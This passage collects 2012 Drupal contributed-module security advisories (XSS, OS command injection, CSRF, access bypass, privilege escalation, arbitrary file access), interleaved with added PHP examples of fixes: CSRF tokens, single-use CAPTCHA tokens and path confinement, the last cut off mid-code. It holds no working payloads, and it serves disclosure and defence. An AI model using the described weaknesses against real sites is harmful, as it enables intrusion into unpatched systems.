* Antti Alamäki [6] the module maintainer

-------- FIXED BY --------

* Antti Alamäki [7] the module maintainer

-------- COORDINATED BY --------

* Klaus Purer [8] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/fonecta_verify
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/fonecta_verify
[4] http://drupal.org/node/1778782
[5] http://drupal.org/project/fonecta_verify
[6] http://drupal.org/user/155131
[7] http://drupal.org/user/155131
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-143 - PRH Search - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789252

* Advisory ID: DRUPAL-SA-CONTRIB-2012-143
* Project: PRH Search [1] (third-party module)
* Version: 7.x
* Date: 2012-September-19
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

PRH Search provides an interface to search for association information for Finnish associations using the PRH (Patentti- ja Rekisterihallitus) database.

The module fails to sanitize data retrieved from an untrusted third party source, thereby exposing an arbitrary script injection vulnerability (XSS).

This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data.

CVE: Requested

-------- VERSIONS AFFECTED --------

* PRH Search 7.x-1.x versions prior to 7.x-1.1

Drupal core is not affected. If you do not use the contributed PRH Search [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the PRH Search module for Drupal 7.x, upgrade to PRH Search 7.x-1.1 [4]

Also see the PRH Search [5] project page.

-------- REPORTED BY --------

* Klaus Purer [6] of the Drupal Security Team

-------- FIXED BY --------

* Antti Alamäki [7] the module maintainer

-------- COORDINATED BY --------

* Klaus Purer [8] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/prh_search
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/prh_search
[4] http://drupal.org/node/1778778
[5] http://drupal.org/project/prh_search
[6] http://drupal.org/user/262198
[7] http://drupal.org/user/155131
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-142 - Spambot - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789242

* Advisory ID: DRUPAL-SA-CONTRIB-2012-142
* Project: Spambot [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-September-19
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

The Spambot module enables you to protect new user registrations from spammers using the database at stopforumspam.com.

Spambot doesn't sufficiently sanitize API responses from stopforumspam.com when they are logged to the watchdog, allowing a potential XSS attack.

This vulnerability is mitigated by the fact that only stopforumspam.com (or someone pretending to be stopforumspam.com) can exploit it.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Spambot 6.x-3.x versions prior to 6.x-3.2.
* Spambot 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Spambot [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Spambot module for Drupal 6.x, upgrade to Spambot 6.x-3.2 [4]
* If you use the Spambot module for Drupal 7.x, upgrade to Spambot 7.x-1.1 [5]

Also see the Spambot [6] project page.

-------- REPORTED BY --------

* Jimmy Axenhus [7]

-------- FIXED BY --------

* Beng Tan [8], the module maintainer
* Jimmy Axenhus [9]

-------- COORDINATED BY --------

* Greg Knaddison [10] of the Drupal Security Team
* Ben Jeavons [11] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/spambot
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/spambot
[4] http://drupal.org/node/1789084
[5] http://drupal.org/node/1789086
[6] http://drupal.org/project/spambot
[7] http://drupal.org/user/565562
[8] http://drupal.org/user/132729
[9] http://drupal.org/user/565562
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/91990
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-139 - PDFThumb - OS Injection
View online: http://drupal.org/node/1782580

* Advisory ID: DRUPAL-SA-CONTRIB-2012-139
* Project: PDFThumb [1] (third-party module)
* Version: 7.x
* Date: 2012-September-12
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: OS Injection

-------- DESCRIPTION --------

PDFThumb module creates thumbnail images of PDF files.

The module doesn't sufficiently escape user-entered values when executing commands on the server allowing an attacker to execute whatever commands are available to the web server user (e.g. www-data).

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer PDFThumb".

CVE: Requested

-------- VERSIONS AFFECTED --------

* PDFThumb 7.x-1.x versions prior to 7.x-1.1

Drupal core is not affected. If you do not use the contributed PDFThumb [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the PDFThumb module for Drupal 7.x, upgrade to PDFThumb 7.x-1.1 [4]

Also see the PDFThumb [5] project page.

-------- REPORTED BY --------

* Matt Kleve [6] of the Drupal Security Team
* mdespeuilles [7], the module maintainer

-------- FIXED BY --------

* Matt Kleve [8] of the Drupal Security Team
* mdespeuilles [9], the module maintainer

-------- COORDINATED BY --------

* Greg Knaddison [10] of the Drupal Security Team
* Matt Kleve [11] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/pdfthumb
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/pdfthumb
[4] http://drupal.org/node/1776248
[5] http://drupal.org/project/pdfthumb
[6] http://drupal.org/user/150473
[7] http://drupal.org/user/939504
[8] http://drupal.org/user/150473
[9] http://drupal.org/user/939504
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/150473
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-141 - Mass Contact - Access bypass
View online: http://drupal.org/node/1782832

* Advisory ID: DRUPAL-SA-CONTRIB-2012-141
* Project: Mass Contact [1] (third-party module)
* Version: 6.x
* Date: 2012-September-12
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

-------- DESCRIPTION --------

This module allows anyone with permission to send a single message to multiple users of a site, using its roles functionality.

The module doesn't sufficiently check permissions after the form has been submitted.

This vulnerability is mitigated by the fact that an attacker must use a tool of some kind (like the Tamper Data Firefox add-on) to intercept the form submission request in order to modify the settings.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Mass Contact 6.x-1.x versions prior to 6.x-1.2.

Drupal core is not affected. If you do not use the contributed Mass Contact [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Mass Contact module for Drupal 6.x, upgrade to Mass Contact 6.x-1.2 [4]

Also see the Mass Contact [5] project page.

-------- REPORTED BY --------

* Michael Orlitzky [6]

-------- FIXED BY --------

* Michael Orlitzky [7]
* Jason Flatt [8] the module maintainer

-------- COORDINATED BY --------

* Greg Knaddison [9] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/mass_contact
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mass_contact
[4] http://drupal.org/node/1782766
[5] http://drupal.org/project/mass_contact
[6] http://drupal.org/user/1731656
[7] http://drupal.org/user/1731656
[8] http://drupal.org/user/4649
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-140 - Inf08 - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1782686

* Advisory ID: DRUPAL-SA-CONTRIB-2012-140
* Project: Inf08 [1] (third-party module)
* Version: 6.x
* Date: 2012-September-12
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

Inf08 is a valid XHTML 1.0 Strict / CSS 2.1 theme ported from the free CSS template.

The theme contains an arbitrary script injection vulnerability (XSS) due to the fact that it fails to sanitize user supplied taxonomy vocabulary names before display.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer taxonomy".

CVE: Requested

-------- VERSIONS AFFECTED --------

* Inf08 6.x-1.x versions prior to 6.x-1.10.

Drupal core is not affected. If you do not use the contributed Inf08 [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Inf08 theme for Drupal 6.x, upgrade to Inf08 6.x-1.10 [4]

Also see the Inf08 [5] project page.

-------- REPORTED BY --------

* Justin C. Klein Keane [6]

-------- FIXED BY --------

* kong [7], the theme maintainer

-------- COORDINATED BY --------

* Klaus Purer [8] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/inf08
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/inf08
[4] http://drupal.org/node/1782286
[5] http://drupal.org/project/inf08
[6] http://drupal.org/user/15344
[7] http://drupal.org/user/46601
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-138 - Exposed Filter Data - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1775582

* Advisory ID: DRUPAL-SA-CONTRIB-2012-138
* Project: Exposed Filter Data [1] (third-party module)
* Version: 6.x
* Date: 2012-September-05
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Exposed Filter Data module facilitates displaying data posted to Views via an exposed filter. The module does not properly sanitize user-supplied data prior to output, leading to a Cross-Site Scripting (XSS) vulnerability.

CVE: Requested

VERSIONS AFFECTED

* Exposed Filter Data 6.x-1.x versions prior to 6.x-1.2.

Drupal core is not affected. If you do not use the contributed Exposed Filter Data [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Exposed Filter Data module for Drupal 6.x, upgrade to Exposed Filter Data 6.x-1.2 [4].
* The 7.x-1.x branch is not vulnerable. If you use Exposed Filter Data for Drupal 7.x, there is nothing you need to do.

Also see the Exposed Filter Data [5] project page.

REPORTED BY

* Joe Tsui [6]
* ekes [7]

FIXED BY

* Shushu Inbar [8], the module maintainer

COORDINATED BY

* Michael Hess (mlhess [9]) of the Drupal Security Team
* Ivo Van Geertruyen (mr.baileys [10]) of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/exposed_filter_data
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/exposed_filter_data
[4] http://drupal.org/node/1774636
[5] http://drupal.org/project/exposed_filter_data
[6] https://drupal.org/user/125025
[7] http://drupal.org/user/10083
[8] https://drupal.org/user/99513
[9] http://drupal.org/user/102818
[10] http://drupal.org/user/383424
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-137 - Heartbeat - Cross Site Request Forgery (CSRF) in heartbeat_comments
View online: http://drupal.org/node/1775470

* Advisory ID: DRUPAL-SA-CONTRIB-2012-137
* Project: Heartbeat [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-September-5
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

This module enables you to display activity for events on a site. The module doesn't sufficiently check the heartbeat comment post values, making it possible for an attacker to cause a user to unknowingly make comments.

CVE: Requested

VERSIONS AFFECTED

* heartbeat_comments 6.x-4.x versions prior to 6.x-4.11.
* heartbeat_comments 7.x-1.x versions prior to 7.x-1.0.

Drupal core is not affected. If you do not use the contributed Heartbeat [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the heartbeat_comments or shouts module for Drupal 6.x, upgrade to heartbeat 6.x-4.12 [4]
* If you use the heartbeat_comments module for Drupal 7.x, upgrade to heartbeat 7.x-1.1 [5]

Also see the Heartbeat [6] project page.

REPORTED BY

* Greg Knaddison [7] of the Drupal Security Team

FIXED BY

* Stalski [8] the module maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team
* Matt Chapman [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/heartbeat
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/heartbeat
[4] http://drupal.org/node/1774140
[5] http://drupal.org/node/1774160
[6] http://drupal.org/project/heartbeat
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/322618
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/143172
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
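The check the Heartbeat advisory describes as missing is a CSRF token verified before the comment is accepted. The block below is an added example, not code from the Heartbeat module: it derives a per-form token from a secret that exists only in the user's session and refuses any post that does not carry it. In Drupal this is what the Form API and drupal_valid_token() do for you; the stand-alone version assumes PHP 7.4 or later and constructed session data.

```php
<?php
// Added example, not the Heartbeat module's own code: a per-session CSRF token
// bound to the form it protects, verified before a comment is stored.
// Assumes PHP 7.4 or later; the session and requests below are constructed.

/** Derive the token for one form from a secret that lives only in the user's session. */
function csrf_token(string $sessionSecret, string $formId): string {
    return hash_hmac('sha256', $formId, $sessionSecret);
}

/** Constant-time comparison of the presented token against the expected one. */
function csrf_valid(string $sessionSecret, string $formId, ?string $presented): bool {
    return $presented !== null
        && hash_equals(csrf_token($sessionSecret, $formId), $presented);
}

/**
 * Handle a POSTed heartbeat comment. The author is taken from the session,
 * never from the request body, and the request is refused without a valid
 * token. Returns the stored comment, or null when the request was rejected.
 */
function handle_comment_post(array $post, array $session, array &$comments): ?array {
    if (!csrf_valid($session['secret'], 'heartbeat_comment_form', $post['token'] ?? null)) {
        return null;
    }
    $comment = ['uid' => $session['uid'], 'message' => (string) ($post['message'] ?? '')];
    $comments[] = $comment;
    return $comment;
}

// Constructed session and requests for the demo.
$session  = ['uid' => 5, 'secret' => bin2hex(random_bytes(32))];
$comments = [];

// The page that rendered the form embedded the token as a hidden field.
$fromOurForm = [
    'message' => 'hello',
    'token'   => csrf_token($session['secret'], 'heartbeat_comment_form'),
];
// A request triggered from another site carries the victim's cookies but
// cannot know the session secret, so it cannot present a matching token.
$fromElsewhere = ['message' => 'unwanted', 'token' => str_repeat('0', 64)];

printf("request from our form:  %s\n", handle_comment_post($fromOurForm, $session, $comments) ? 'stored' : 'rejected');
printf("request from elsewhere: %s\n", handle_comment_post($fromElsewhere, $session, $comments) ? 'stored' : 'rejected');
printf("comments stored: %d\n", count($comments));
```

Binding the token to the form id as well as the session means a token leaked from one form cannot be replayed against another; taking the author id from the session rather than the post body closes the second half of the problem, where the request body chooses who "made" the comment.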
[Full-disclosure] [Security-news] SA-CONTRIB-2012-136 - Apache Solr Search Autocomplete - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1762734

* Advisory ID: DRUPAL-SA-CONTRIB-2012-136
* Project: Apache Solr Autocomplete [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-August-29
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

Apache Solr Search Autocomplete module enables you to add autocomplete capabilities to the search text field for the Apache Solr Search Integration module. The module doesn't sufficiently filter the autocomplete results sent back from the Drupal site, so under the scenario where someone provided a URL with a specially-crafted search string embedded in it, the attacker could have a user execute arbitrary Javascript when clicking or focusing on the autocomplete text field.

This vulnerability is mitigated by the fact that the attacked user must click or otherwise give focus to the text widget to have the Javascript activate.

CVE: Requested

VERSIONS AFFECTED

* Apache Solr Autocomplete 6.x-1.x versions prior to 6.x-1.4.
* Apache Solr Autocomplete 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Apache Solr Autocomplete [3] module, there is nothing you need to do.

SOLUTION

Install the latest version.

* If you use the Apache Solr Autocomplete module for Drupal 6.x, upgrade to Apache Solr Autocomplete 6.x-1.4 [4]
* If you use the Apache Solr Autocomplete module for Drupal 7.x, upgrade to Apache Solr Autocomplete 7.x-1.3 [5]

Also see the Apache Solr Autocomplete [6] project page.

REPORTED BY

* drupaledmonk [7]

FIXED BY

* Alejandro Garza [8] the module maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/apachesolr_autocomplete
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/apachesolr_autocomplete
[4] http://drupal.org/node/1762684
[5] http://drupal.org/node/1762686
[6] http://drupal.org/project/apachesolr_autocomplete
[7] http://drupal.org/user/263391
[8] http://drupal.org/user/153120
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-135 - CAPTCHA - Insufficient anti-automation prevention
View online: http://drupal.org/node/1762496

* Advisory ID: DRUPAL-SA-CONTRIB-2012-135
* Project: CAPTCHA [1] (third-party module)
* Version: 6.x
* Date: 2011-August-29
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

This module enables you to protect website forms using a CAPTCHA. A CAPTCHA is a test which attempts to differentiate between a human and an automated bot or script.

The module doesn't ensure that test submissions have a single-use unique token. This means that web robots could reuse a single successful submission multiple times, reducing the effectiveness of the protection.

CVE: Requested

VERSIONS AFFECTED

* CAPTCHA 6.x-2.x versions prior to 6.x-2.3

Drupal core is not affected. If you do not use the contributed CAPTCHA [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the CAPTCHA module for Drupal 6.x, upgrade to CAPTCHA 6.x-2.3 [4] or greater

Also see the CAPTCHA [5] project page.

REPORTED BY

* LeeSai [6]
* MustLive

FIXED BY

* Stefaan Lippens [7] a CAPTCHA module maintainer

COORDINATED BY

* Owen Barton [8] of the Drupal Security Team
* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/captcha
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/captcha
[4] http://drupal.org/node/967244
[5] http://drupal.org/project/captcha
[6] http://drupal.org/user/680166
[7] http://drupal.org/user/41478
[8] http://drupal.org/user/19668
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
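The weakness in the CAPTCHA advisory is replay: without a single-use token, one correct solution can be resubmitted indefinitely. The block below is an added example, not the CAPTCHA module's own code. It stores each challenge under an unguessable token and deletes the token before the answer is even compared, so the second submission of the same token fails whatever the first one did. The in-memory store and the sample answer are constructed for the demo; a real site would keep the challenges in the database or session. Assumes PHP 7.4 or later.

```php
<?php
// Added example, not the CAPTCHA module's own code: CAPTCHA challenges keyed
// by a one-time token so that a recorded successful submission cannot be
// replayed. The store is an in-memory array for the demo (assumption);
// a real module would persist it per session or in the database.
// Assumes PHP 7.4 or later.

final class CaptchaStore {
    /** @var array<string, array{answer: string, expires: int}> token => challenge */
    private array $challenges = [];

    /** Register a challenge and return the token the form must carry back. */
    public function issue(string $answer, int $ttl = 600): string {
        $token = bin2hex(random_bytes(16));          // unique and unguessable
        $this->challenges[$token] = [
            'answer'  => $answer,
            'expires' => time() + $ttl,
        ];
        return $token;
    }

    /**
     * Validate one submission. The challenge is removed before the answer is
     * compared, so a token can succeed at most once, and a wrong answer also
     * burns it (the robot cannot keep guessing against the same challenge).
     */
    public function validate(string $token, string $submitted): bool {
        if (!isset($this->challenges[$token])) {
            return false;                             // unknown or already used
        }
        $challenge = $this->challenges[$token];
        unset($this->challenges[$token]);             // single use: consume first
        if ($challenge['expires'] < time()) {
            return false;                             // expired challenge
        }
        return hash_equals($challenge['answer'], $submitted);
    }
}

// Demo with a constructed answer; the token would travel in a hidden field.
$store = new CaptchaStore();
$token = $store->issue('7kq3p');

$results = [
    'first submission, correct answer' => $store->validate($token, '7kq3p'),
    'replay of the same token'         => $store->validate($token, '7kq3p'),
    'unknown token'                    => $store->validate(bin2hex(random_bytes(16)), '7kq3p'),
];
foreach ($results as $case => $accepted) {
    printf("%-34s %s\n", $case . ':', $accepted ? 'accepted' : 'rejected');
}
```

The ordering inside validate() is the point: consume the token, then check expiry, then compare the answer. Comparing first and consuming only on success would let a bot retry a single token until it hits the right answer.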
[Full-disclosure] [Security-news] SA-CONTRIB-2012-134 - Views - Privilege Escalation
View online: http://drupal.org/node/1762492

* Advisory ID: DRUPAL-SA-CONTRIB-2012-134
* Project: (third-party module)
* Version: 6.x
* Date: 2012-August-29
* Security risk: Critical [1]
* Exploitable from: Remote
* Vulnerability: Privilege escalation

DESCRIPTION

The Views module provides a flexible method for Drupal site designers to control how lists and tables of content, users, taxonomy terms and other data are presented. The module incorrectly modifies the global user object in some situations when a view has a uid argument and performs validation on that argument.

This vulnerability is mitigated by the fact that it only affects sites with more roles than default where a role with a low role ID has more privileges than other roles on the site and where untrusted (i.e. potentially malicious) users are granted several of those roles.

CVE: Requested

VERSIONS AFFECTED

* Views 6.x-2.x versions prior to 6.x-2.16.

Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Views module for Drupal 6.x, upgrade to Views 6.x-2.16 [2]

Also see the project page.

REPORTED BY

* Derek Wright [3] of the Drupal Security Team
* John Preto [4]

FIXED BY

* Derek Wright [5], one of the module maintainers, also of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [6] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7].

Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10].

[1] http://drupal.org/security-team/risk-levels
[2] http://drupal.org/node/1341504
[3] http://drupal.org/user/46549
[4] http://drupal.org/user/356949
[5] http://drupal.org/user/46549
[6] http://drupal.org/user/36762
[7] http://drupal.org/contact
[8] http://drupal.org/security-team
[9] http://drupal.org/writing-secure-code
[10] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-129 - Activism - Access Bypass
View online: http://drupal.org/node/1762160

* Advisory ID: DRUPAL-SA-CONTRIB-2012-129
* Project: Activism [1] (third-party module)
* Version: 6.x
* Date: 2012-08-29
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access Bypass

DESCRIPTION

The Activism module is an attempt to standardize the way online advocacy tools are built in Drupal 6. It ships with and creates a "Campaign" content type which is always viewable, even when an administrator unpublishes it or otherwise restricts viewing access.

CVE: Requested

VERSIONS AFFECTED

* Activism 6.x-2.0.

Drupal core is not affected. If you do not use the contributed Activism [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Activism module for Drupal 6.x, upgrade to Activism 6.x-2.1 [4]

Also see the Activism [5] project page.

REPORTED BY

* Sheldon Rampton [6]

FIXED BY

* Sheldon Rampton [7], the issue reporter
* Stella Power [8] of the Drupal Security Team

COORDINATED BY

* Stella Power [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/activism
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/activism
[4] http://drupal.org/node/1762152
[5] http://drupal.org/project/activism
[6] http://drupal.org/user/13085
[7] http://drupal.org/user/13085
[8] http://drupal.org/user/66894
[9] http://drupal.org/user/66894
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-130 - Jstool - Multiple Vulnerabilities
View online: http://drupal.org/node/1762220

* Advisory ID: DRUPAL-SA-CONTRIB-2012-130
* Project: Javascript Tool [1] (third-party module)
* Version: 7.x
* Date: 2012-August-29
* Security risk: Highly critical [2]
* Exploitable from: Remote
* Vulnerability: Multiple vulnerabilities

DESCRIPTION

Javascript Tool enables administrators to edit any javascript file online from an admin panel.

The module does not protect its menu paths, which contain sensitive information about all javascript files on the site and their contents.

The module does not validate filenames which can lead to potential read/write access to arbitrary files on the server. Write access to files is mitigated by the fact that an attacker must have the permission to use the full_html text format.

CVE: Requested

VERSIONS AFFECTED

* Javascript Tool 7.x-1.x versions prior to 7.x-1.7.

Drupal core is not affected. If you do not use the contributed Javascript Tool [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Javascript Tool module for Drupal 7.x, upgrade to Javascript Tool 7.x-1.7 [4]

Also see the Javascript Tool [5] project page.

REPORTED BY

* Klaus Purer [6] of the Drupal Security Team

FIXED BY

* drupwash [7] the module maintainer

COORDINATED BY

* Klaus Purer [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/jstool
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/jstool
[4] http://drupal.org/node/1759538
[5] http://drupal.org/project/jstool
[6] http://drupal.org/user/262198
[7] http://drupal.org/user/1652472
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
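The Javascript Tool advisory names two separate defects: handlers reachable without a permission check, and file names that are never confined to the script directory. The block below is an added example, not the module's own code, showing both checks in a stand-alone handler: the permission is tested first, then the supplied name is reduced to a bare `.js` file name inside the base directory and symlinks are refused. The permission name, the temporary fixture directory and the file contents are constructed for the demo; PHP 8 or later is assumed for str_starts_with().

```php
<?php
// Added example, not the Javascript Tool module's own code: confine an
// administrator-supplied file name to the site's script directory and gate
// the handler on a permission. The permission name is hypothetical and the
// fixture directory is constructed for the demo. Assumes PHP 8 or later.

/**
 * Absolute path of $name inside $baseDir, or null when the name is not a
 * bare .js file name, when it is a symlink, or when it resolves outside
 * the directory. Non-existent names are returned so a new file can be
 * written there; the bare-name rule already keeps them inside $baseDir.
 */
function confined_js_path(string $baseDir, string $name): ?string {
    $base = realpath($baseDir);
    if ($base === false) return null;
    // Only a bare file name: no "..", no slashes, no absolute paths.
    if ($name === '' || $name !== basename($name)) return null;
    if (strtolower(pathinfo($name, PATHINFO_EXTENSION)) !== 'js') return null;
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    if (is_link($candidate)) return null;           // never follow links, dangling or not
    $real = realpath($candidate);
    if ($real === false) return $candidate;         // does not exist yet
    // Defense in depth: the resolved path must still sit under the base.
    return str_starts_with($real, $base . DIRECTORY_SEPARATOR) ? $real : null;
}

/** Handler shape: permission first, then the confined path, then the read. */
function jstool_read(array $account, string $baseDir, string $name): ?string {
    if (!in_array('administer javascript files', $account['permissions'], true)) {
        return null;                                // access denied
    }
    $path = confined_js_path($baseDir, $name);
    if ($path === null || !is_file($path)) return null;
    return file_get_contents($path);
}

// Constructed fixture: one script inside js/, one sensitive file beside it.
$root = sys_get_temp_dir() . '/jstool_demo_' . bin2hex(random_bytes(4));
mkdir("$root/js", 0700, true);
file_put_contents("$root/js/site.js", "console.log('ok');");
file_put_contents("$root/settings.php", "<?php \$db_pass = 'constructed';");
if (function_exists('symlink')) @symlink("$root/settings.php", "$root/js/link.js");

$admin = ['permissions' => ['administer javascript files']];
$anon  = ['permissions' => []];

$cases = [
    'admin reads site.js'             => jstool_read($admin, "$root/js", 'site.js'),
    'anonymous reads site.js'         => jstool_read($anon,  "$root/js", 'site.js'),
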